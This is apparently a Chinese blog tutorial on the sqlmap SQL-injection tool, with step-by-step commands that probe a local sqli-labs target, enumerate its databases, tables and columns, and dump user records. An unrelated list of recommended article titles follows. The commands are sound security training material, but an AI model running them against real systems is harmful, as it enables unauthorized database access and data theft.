Sqlmap

https://sqlmap.org/

sqlmap是一个开源,跨平台的自动化SQL注入工具,目前支持大多数主流数据库有MySQL,Oracle, PostgreSQL, Microsoft SQL Server, Microsoft Access, IBM DB2, SQLite等

sqlmap的强大的功能包括 数据库指纹识别、数据库枚举、数据提取、访问目标文件系统,并在获取完全的操作权限时执行任意命令。

我们可以使用 -h参数来查看 sqlmap 的可选参数以及用法,sqlmap -h

-hh 参数可以查看更详细的用法,sqlmap -hh

小试牛刀

靶场:这里我们使用搭建的 sqli-labs(https://github.com/Audi-1/sqli-labs/wiki)来进行测试

步骤

  1. 查看是否能注入

-u, --url表示指定url

sqlmap -u "http://127.0.0.1/Less-1/?id=1"
sqlmap -u "http://127.0.0.1/Less-1/?id=1" -p id # 可以指定注入参数

Parameter表示注入参数为id,Get表示为Get请求,Type表示支持的注入类型

  1. 查看所有数据库

--dbs表示枚举所有数据库

sqlmap -u "http://127.0.0.1/Less-1/?id=1" --dbs

  1. 查看指定数据库所有表

-D 表示指定数据库 --tables 表示枚举所有表

sqlmap -u "http://127.0.0.1/Less-1/?id=1" -D security --tables

  1. 查看指定数据表的所有列

-T表示指定表 --columns表示枚举所有列名与数据类型

sqlmap -u "http://127.0.0.1/Less-1/?id=1" -D security -T users --columns

  1. 查看指定数据表指定列的内容

-C 表示指定列 --dump 表示输出数据 --start表示开始位置 --stop表示停止位置

sqlmap -u "http://127.0.0.1/Less-1/?id=1" -D security -T users -C id,username --dump --start 1 --stop 5

sqlmap入门使用教程相关推荐

  1. 扫掠两条引导线_NX10 入门图文教程——异形台架(扫掠或者沿引导线扫掠)

    NX10 入门图文教程--异形台架(扫掠或者沿引导线扫掠) 块,长方体,由于这个体不是对称的,所以选择长方体完成,原点开始,设置参数 长方体,选择棱边端点,这个地方用长方体目的是上方的这个块与下面的块 ...

  2. MAYA 2022基础入门学习教程

    流派:电子学习| MP4 |视频:h264,1280×720 |音频:AAC,48.0 KHz 语言:英语+中英文字幕(根据原英文字幕机译更准确)|大小解压后:3.41 GB |时长:4.5小时 包含 ...

  3. 3dmax Vray建筑可视化入门学习教程

    面向初学者的3Ds Max Vray最佳Archviz可视化课程 从安装到最终图像的一切都将从头开始教授,不需要任何经验 大小解压后:3.25G 时长4h 6m 1280X720 MP4 语言:英语+ ...

  4. Blender 3.0基础入门学习教程 Introduction to Blender 3.0

    成为Blender通才,通过这个基于项目的循序渐进课程学习所有主题的基础知识. 你会学到什么 教程获取:Blender 3.0基础入门学习教程 Introduction to Blender 3.0- ...

  5. Maya游戏角色绑定入门学习教程 Game Character Rigging for Beginners in Maya

    准备好开始为游戏制作自己的角色动画了吗? 你会学到什么 了解Maya的界面 优化并准备好你的模型,为游戏做准备 了解关节以及如何使用它们来构建健壮的角色骨骼,以便在任何游戏引擎中制作动画 了解IK和F ...

  6. 三维地形制作软件 World Machine 基础入门学习教程

    <World Machine课程>涵盖了你需要的一切,让你有一个坚实的基础来构建自己的高质量的电影或视频游戏地形. 你会学到什么 为渲染或游戏开发创建高分辨率.高细节的地形. 基于Worl ...

  7. Blender3.0动画制作入门学习教程 Learn Animation with Blender (2021)

    要求 下载并安装Blender.免费下载和免费用于任何目的. 描述 加入我的动画课程. 在本课程中,我将从头开始讲述在Blender中创建动画场景的过程. 从第一步到最终渲染.在这个课程中,我们将使用 ...

  8. UE5真实环境设计入门学习教程

    大小解压后:4.69G 时长4h 30m 1280X720 MP4 语言:英语+中英文字幕(根据原英文字幕机译更准确) 虚幻引擎5–面向初学者的真实环境设计 Unreal Engine 5 – Rea ...

  9. ZBrush全面入门学习教程 Schoolism – Introduction to ZBrush

    ZBrush全面入门学习教程 Schoolism – Introduction to ZBrush ZBrush全面入门学习教程 Schoolism – Introduction to ZBrush ...

  10. Maya基础入门学习教程

    Maya基础入门学习教程 视频:.MKV, 1280x720, 共57节课 时长 4小时25分钟,3GB 语言:英语+中文字幕(根据原英文字幕机译更准确)+原英文字幕 指导老师:Shane Whitt ...

最新文章

  1. 第二课.C++基础语法
  2. 笔记 - AliCloud 云数据库 简介
  3. JavaWeb三大组件之Servlet
  4. CSDN登陆校验码模式识别程序
  5. python sklearn安装_安装 scikit-learn
  6. sharepoint_study_5
  7. python读取linux内存_使用python获取CPU和内存信息(linux系统)
  8. JavaScript和Chrome中的SSDP发现
  9. mysql字符串处理函数left()、length()使用
  10. AI速查表:神经网络、机器学习、深度学习与数据科学一览
  11. winhttp 访问https_VB6: 在客户端中使用WinHttp组件,发送Https请求
  12. HDTunePro v5.00 硬盘专业工具(绿色版)
  13. 全倒装COB小间距LED全彩显示屏必将推动下一代显示技术的发展。
  14. linux下,pip安装lap出现问题 ,已解决,亲测有效
  15. 深度学习论文笔记(知识蒸馏)—— FitNets: Hints for Thin Deep Nets
  16. 教程 | 阿克曼结构移动机器人的gazebo仿真(一)
  17. 5G独立组网(SA)和 非独立组网(NSA)
  18. 人工智能导论丁世飞第三版期末考试复习大纲
  19. 压电雨量传感器特点介绍 单个雨量自动监测
  20. 计算机专业自考研究生,自考本科的学历,考研报985和211院校是不是容易被刷

热门文章

  1. centos7网卡配置文件详解与固定服务器ip
  2. intelliJ idea代码折叠
  3. php Hash Table(二) Hash函数
  4. linux下C语言获取微秒级时间
  5. 使用SqlBulkCopy类实现导入excel表格
  6. 【C语言】23-typedef
  7. c语言线性拉伸0到255,数字图像处理作业题.doc
  8. 文本区域css,如何知道文本从一个CSS区域溢出到另一个区域?
  9. Oprofile工具的使用
  10. 常见排序算法之基数排序